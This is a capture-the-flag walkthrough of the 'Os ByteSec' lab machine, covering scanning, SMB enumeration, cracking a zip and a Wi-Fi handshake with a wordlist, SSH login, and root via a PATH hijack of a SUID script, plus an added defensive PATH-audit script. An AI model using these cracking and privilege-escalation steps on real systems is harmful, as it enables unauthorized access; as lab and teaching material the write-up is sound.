Os ByteSec walkthrough
Host discovery
arp-scan -l
Network topology
| Machine | IP |
|---|---|
| Local host (Win10) | 192.168.36.234 |
| Kali | 192.168.36.89 |
| OS-ByteSec | 192.168.36.190 |
Port and version scan
nmap -A 192.168.36.190
```
┌──(root💀kali)-[~]
└─# nmap -A 192.168.36.190
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-29 04:40 UTC
Nmap scan report for 192.168.36.190
Host is up (0.017s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
| 256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_ 256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
MAC Address: A8:66:7F:1B:19:D8 (Apple)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: NITIN; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -18h00m26s, deviation: 3h10m30s, median: -16h10m27s
|_nbstat: NetBIOS name: NITIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: nitin
| NetBIOS computer name: NITIN\x00
| Domain name: 168.1.7
| FQDN: nitin.168.1.7
|_ System time: 2021-06-28T18:00:43+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-28T12:30:43
|_ start_date: N/A
...
```
The scan shows the target has port 80 (HTTP) open, the SMB ports 139/445, and SSH on port 2525. The next step was directory enumeration on port 80, which turned up nothing useful; the key information appeared later while viewing the source of the home page:
```
<meta name="description" content="Cloud 83 - hosting template ">
```
This indicates the site is built on the Cloud 83 CMS, but searching Google for the site's directory structure gave nothing either. Following the hint on the page, ###################GET#####smb##############free, SMB enumeration was the next thing to try; the output of enum4linux reveals three users:
```
┌──(root💀kali)-[~]
└─# enum4linux -A 192.168.36.190
...
==========================
| Target Information |
==========================
Target ........... 192.168.36.190
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)
...
```
Then log in to the SMB share with smbclient; the share contains useful files:
```
┌──(root💀kali)-[~]
└─# smbclient //192.168.36.190/smb -U smb -p
Enter WORKGROUP\sagar's password:
Try "help" to get a list of possible commands.
smb: \> help
...
smb: \> get main.txt
getting file \main.txt of size 10 as main.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> get safe.zip
getting file \safe.zip of size 3424907 as safe.zip (246.5 KiloBytes/sec) (average 246.1 KiloBytes/sec)
smb: \> q
```
The archive safe.zip is password-protected, so fcrackzip was used to brute-force it with a wordlist; the extraction password is hacker1.
```
fcrackzip -D -p /usr/share/wordlists/Passwords/Leaked-Databases/rockyou.txt -u safe.zip
```
Note that the extracted files include a network capture, user.cap.
```
┌──(root💀kali)-[~]
└─# unzip safe.zip
Archive: safe.zip
[safe.zip] secret.jpg password:
inflating: secret.jpg
inflating: user.cap
```
capinfos shows that the capture is IEEE 802.11 Wireless LAN traffic, so aircrack-ng can be run against it with the same wordlist; it recovers the Wi-Fi password snowflake.
```
┌──(root💀kali)-[~]
└─# aircrack-ng -w /usr/share/wordlists/Passwords/Leaked-Databases/rockyou.txt user.cap
Reading packets, please wait...
Opening user.cap
Read 49683 packets.
# BSSID ESSID Encryption
1 56:DC:1D:19:52:BC blackjax WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening user.cap
Read 49683 packets.
1 potential targets
Aircrack-ng 1.6
[00:00:03] 1498/14344391 keys tested (490.93 k/s)
Time left: 8 hours, 7 minutes, 51 seconds 0.01%
KEY FOUND! [ snowflake ]
...
```
Getshell
Log in over SSH with the credentials blackjax:snowflake; the first flag is in that user's home directory.
```
┌──(root💀kali)-[~]
└─# ssh blackjax@192.168.36.190 -p 2525
The authenticity of host '[192.168.36.190]:2525 ([192.168.36.190]:2525)' can't be established.
ECDSA key fingerprint is SHA256:5gu5GYZGsKZdvbswwXjbx8FgUET16ucBiRrer1dGn80.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...
$ cat user.txt
_ _ _____ ______ _____ ______ _ _____
| | | |/ ____| ____| __ \ | ____| | /\ / ____|
| | | | (___ | |__ | |__) |_____| |__ | | / \ | | __
| | | |\___ \| __| | _ /______| __| | | / /\ \| | |_ |
| |__| |____) | |____| | \ \ | | | |____ / ____ \ |__| |
\____/|_____/|______|_| \_\ |_| |______/_/ \_\_____|
Go To Root.
MD5-HASH : f589a6959f3e04037eb2b3eb0ff726ac
```
Privilege escalation
Searching for SUID files as this user turns up an unusual script, /usr/bin/netscan. Running it prints the current network connections, so it is a wrapper script around the netstat tool.
```
$ find / -type f -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/at
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/netscan
/usr/bin/sudo
/bin/ping6
/bin/fusermount
/bin/mount
/bin/su
/bin/ping
/bin/umount
/bin/ntfs-3g
```
So privileges can be escalated through the PATH environment variable; see this article for the general technique. In this instance the steps are:
- Change to the /tmp directory, where files can be created freely.
- Create a shell script named netstat: `echo "/bin/bash" > netstat`
- Prepend /tmp to the $PATH variable so that scripts in that directory are found from any location: `export PATH=/tmp:$PATH`
- Run /usr/bin/netscan; the script switches to the root account.
This yields the final flag:
```
root@nitin:/root# cat root.txt
____ ____ ____ ______ ________ ___ ______
/ __ \/ __ \/ __ \/_ __/ / ____/ / / | / ____/
/ /_/ / / / / / / / / / / /_ / / / /| |/ / __
/ _, _/ /_/ / /_/ / / / / __/ / /___/ ___ / /_/ /
/_/ |_|\____/\____/ /_/____/_/ /_____/_/ |_\____/
/_____/
Conguratulation..
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
Author : Rahul Gehlaut
Contact : https://www.linkedin.com/in/rahulgehlaut/
WebSite : jameshacker.me
```
Summary
The privilege escalation works because /usr/bin/netscan is owned by root (and SUID), and while running it invokes the system's netstat tool by bare name. Since we created a script also named netstat in /tmp and added that directory to the PATH variable, the lookup for netstat resolves to our script instead, which returns a shell. The one thing to get right beforehand is that /tmp must be placed at the front of PATH.
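As an added defender-side example (not part of the original walkthrough), the Python below shows the two mitigations that close this class of bug: an audit that flags PATH entries an unprivileged user can control, and a lookup that resolves a helper command only from a fixed list of trusted, non-writable directories instead of the caller's $PATH. Function names are assumptions, and the fake netstat planted in the demo is a constructed, harmless stand-in.

```python
import os
import stat
import tempfile

# Fixed directories a privileged helper should search instead of the caller's $PATH.
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")


def unsafe_path_entries(path_value):
    """Return (entry, reason) pairs for PATH entries an unprivileged user could control."""
    findings = []
    for entry in path_value.split(":"):
        if not entry.startswith("/"):
            findings.append((entry, "relative entry, resolved from the current directory"))
            continue
        try:
            st = os.stat(entry)
        except OSError:
            continue  # a missing directory cannot be used to plant a lookalike
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((entry, "writable by group or others"))
    return findings


def resolve_trusted(command, search_dirs=TRUSTED_DIRS):
    """Locate a bare command name in trusted, non-writable directories only; None if absent."""
    if "/" in command:
        raise ValueError("command must be a bare name, not a path")
    for directory in search_dirs:
        if unsafe_path_entries(directory):
            continue  # skip any directory an unprivileged user could have written to
        candidate = os.path.join(directory, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def demo():
    """Constructed scenario mirroring the walkthrough; returns (flagged, planted_chosen)."""
    with tempfile.TemporaryDirectory() as planted:
        os.chmod(planted, 0o1777)  # world-writable, like /tmp
        fake = os.path.join(planted, "netstat")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho planted\n")  # harmless stand-in for the hijack script
        os.chmod(fake, 0o755)
        flagged = planted in dict(unsafe_path_entries(planted + ":/usr/bin:/bin"))
        chosen = resolve_trusted("netstat", (planted,) + TRUSTED_DIRS)
        return flagged, chosen == fake
```

demo() returns (True, False): the planted directory is reported by the audit and is never selected by the trusted lookup, even when it appears first in the search list.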